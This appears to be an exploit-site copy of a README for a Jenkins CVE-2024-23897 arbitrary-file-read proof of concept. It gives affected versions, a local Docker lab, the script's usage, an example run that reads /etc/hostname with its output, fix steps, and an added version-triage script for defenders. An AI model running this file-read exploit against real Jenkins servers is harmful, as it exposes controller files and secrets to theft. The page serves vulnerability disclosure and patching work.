## https://sploitus.com/exploit?id=5D31F81D-FA5D-54A4-AB47-1E44CDFB0608
# Jenkins CVE-2024-23897 PoC
A proof-of-concept (PoC) for CVE-2024-23897, an arbitrary file read vulnerability in Jenkins' built-in command line interface (CLI). It allows unauthenticated attackers with Overall/Read permission to read arbitrary files on the Jenkins controller file system.
**Affected Versions**
- Jenkins versions <= 2.441
- Jenkins LTS versions <= 2.426.2
## Set up a vulnerable instance
Spin up a local vulnerable instance using docker compose:
```bash
cd docker
docker compose up -d
```
The instance will be available at `http://localhost:1234`.
## Exploitation
```bash
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]
Jenkins CVE-2024-23897 file-read PoC
options:
-h, --help show this help message and exit
--url URL URL for Jenkins instance (default: http://localhost:1234)
--file FILE File to read (default: /etc/hostname)
--method {1,2,3} The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)
```
**Example**
```bash
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...
ERROR: No such agent "jenkins_vuln_instance" exists.
[i] Upload request done
[i] All threads completed
```
The script may have issues reading larger files due to concurrency and connection timeouts. For more technical details and a walkthrough of the vulnerability, take a look at my [blog post on the topic](https://abraxas.pages.dev/blog/cve-2024-23897/).
## Fix
- Upgrade to Jenkins 2.442 or LTS 2.426.3
- Apply temporary workarounds as described in the [Jenkins security advisory](https://www.jenkins.io/security/advisory/2024-01-24/).
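A defender-side version triage, added here as an example and not part of this PoC repository: it parses the version Jenkins advertises in its `X-Jenkins` response header (assumed present; constructed header dictionaries stand in for live responses) and reports whether an instance still falls inside the affected ranges listed above, so a fleet can be sorted into "patch now" and "done".

```python
"""Version triage for CVE-2024-23897 (added example, not the PoC's own code).

Assumption: LTS releases carry three numeric components (e.g. 2.426.2) and
weekly releases two (e.g. 2.441), so the component count selects the range.
"""
import re

AFFECTED_WEEKLY_MAX = (2, 441)      # weekly  <= 2.441   is affected
AFFECTED_LTS_MAX = (2, 426, 2)      # LTS     <= 2.426.2 is affected
FIXED_WEEKLY = "2.442"
FIXED_LTS = "2.426.3"


def parse_version(value):
    """Turn '2.426.2' into (2, 426, 2); reject anything that is not numeric."""
    m = re.fullmatch(r"\s*(\d+(?:\.\d+){1,2})\s*", value or "")
    if not m:
        raise ValueError(f"unrecognised Jenkins version: {value!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def is_affected(version):
    """True if the version lies inside the vulnerable range of its release line."""
    v = parse_version(version)
    if len(v) == 3:                      # LTS line: 2.x.y
        return v <= AFFECTED_LTS_MAX
    return v <= AFFECTED_WEEKLY_MAX      # weekly line: 2.x


def triage(headers):
    """Classify one controller from its HTTP response headers (a dict)."""
    version = headers.get("X-Jenkins")
    if version is None:
        return "unknown: no X-Jenkins header (not Jenkins, or header suppressed)"
    target = FIXED_LTS if len(parse_version(version)) == 3 else FIXED_WEEKLY
    if is_affected(version):
        return f"AFFECTED: Jenkins {version}; upgrade to {target} or apply the advisory workaround"
    return f"ok: Jenkins {version} is at or past {target}"


if __name__ == "__main__":
    # Constructed header sets standing in for responses from three controllers.
    for hdrs in ({"X-Jenkins": "2.441"}, {"X-Jenkins": "2.426.3"}, {"Server": "nginx"}):
        print(triage(hdrs))
```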
## Related Links
- [Sonar Source | Excessive Expansion: Uncovering Critical Security Vulnerabilities in Jenkins](https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/)
- [Jenkins Security Advisory - 2024-01-24](https://www.jenkins.io/security/advisory/2024-01-24/#binary-files-note)
- [Qualys ThreatPROTECT | Jenkins Core Remote Code Execution Vulnerability (CVE-2024-23897)](https://threatprotect.qualys.com/2024/01/29/jenkins-core-remote-code-execution-vulnerability-cve-2024-23897/)
- [CVE-2024-23897: Assessing the Impact of the Jenkins Arbitrary File Leak Vulnerability | Horizon3.ai](https://www.horizon3.ai/cve-2024-23897-assessing-the-impact-of-the-jenkins-arbitrary-file-leak-vulnerability/)